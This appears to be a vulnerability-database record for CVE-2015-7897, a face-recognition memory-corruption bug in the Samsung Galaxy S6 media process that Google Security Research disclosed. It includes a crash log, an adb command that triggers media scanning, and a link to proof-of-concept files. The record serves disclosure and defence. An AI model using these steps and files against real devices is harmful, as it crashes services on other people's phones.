ID
VAR-E-201511-0064
CVE
| cve_id: | CVE-2015-7897 | Trust: 2.4 |
EDB ID
38611
TITLE
Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption - Android dos Exploit
Trust: 0.6
DESCRIPTION
Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption. CVE-2015-7897CVE-129755 . dos exploit for Android platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | samsung | model: | galaxy s6 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | samsung | model: | galaxy s6 android.media.process face recognition | scope: | - | version: | - | Trust: 0.5 |
| vendor: | samsung | model: | galaxy s6 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
Source: https://code.google.com/p/google-security-research/issues/detail?id=499
The attached files cause memory corruption when they are scanned by the face recognition library in android.media.process.
From faces-art.bmp
F/libc (11305): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 11555 (Thread-1136)
I/DEBUG ( 2955): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 2955): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG ( 2955): Revision: '10'
I/DEBUG ( 2955): ABI: 'arm64'
I/DEBUG ( 2955): pid: 11305, tid: 11555, name: Thread-1136 >>> android.process.media <<<
I/DEBUG ( 2955): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
I/DEBUG ( 2955): x0 0000007f94ca2100 x1 0000007f94c63480 x2 0000007f94c0e200 x3 0000000000000000
I/DEBUG ( 2955): x4 0000000000000000 x5 0000000000000040 x6 000000000000003f x7 0000000000000000
I/DEBUG ( 2955): x8 0000007f94c0e240 x9 0000000000000004 x10 000000000000003b x11 000000000000003a
I/DEBUG ( 2955): x12 0000007f94c02080 x13 00000000ffffffff x14 0000007f94c02080 x15 000000000151c5e8
I/DEBUG ( 2955): x16 0000007f885fe900 x17 0000007f9ee60d80 x18 0000007f9eed5a40 x19 0000007f94c1d100
I/DEBUG ( 2955): x20 0000000000000000 x21 0000007f94c65150 x22 0000007f949d0550 x23 0000007f94c1d110
I/DEBUG ( 2955): x24 0000000012d39070 x25 0000000000000066 x26 0000000012d23b80 x27 0000000000000066
I/DEBUG ( 2955): x28 0000000000000000 x29 0000007f949cfd70 x30 0000007f87acd200
I/DEBUG ( 2955): sp 0000007f949cfd70 pc 0000000000000000 pstate 0000000040000000
I/DEBUG ( 2955):
I/DEBUG ( 2955): backtrace:
I/DEBUG ( 2955): #00 pc 0000000000000000 <unknown>
I/DEBUG ( 2955): #01 pc 0000000000000001 <unknown>
I/DEBUG ( 2955): #02 pc 26221b0826221b08 <unknown>
To reproduce, download the attached file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38611.zip
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
android.media.process Face Recognition Memory Corruption
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | proof of concept | Trust: 0.5 |
CREDITS
Google Security Research
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2015-7897 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 38611 | Trust: 1.6 |
| db: | EDBNET | id: | 60559 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 134199 | Trust: 0.5 |
| db: | BID | id: | 77422 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2015-7897 | Trust: 2.1 |
| url: | https://code.google.com/p/google-security-research/issues/detail?id=499 | Trust: 1.3 |
| url: | https://www.exploit-db.com/exploits/38611/ | Trust: 0.6 |
| url: | http://www.samsung.com/ | Trust: 0.3 |
| url: | http://googleprojectzero.blogspot.ie/2015/11/hack-galaxy-hunting-bugs-in-samsung.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 77422 |
| db: | PACKETSTORM | id: | 134199 |
| db: | EXPLOIT-DB | id: | 38611 |
| db: | EDBNET | id: | 60559 |
LAST UPDATE DATE
2022-07-27T09:49:34.441000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 77422 | date: | 2015-11-03T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 77422 | date: | 2015-11-03T00:00:00 |
| db: | PACKETSTORM | id: | 134199 | date: | 2015-11-03T13:44:44 |
| db: | EXPLOIT-DB | id: | 38611 | date: | 2015-11-03T00:00:00 |
| db: | EDBNET | id: | 60559 | date: | 2015-11-03T00:00:00 |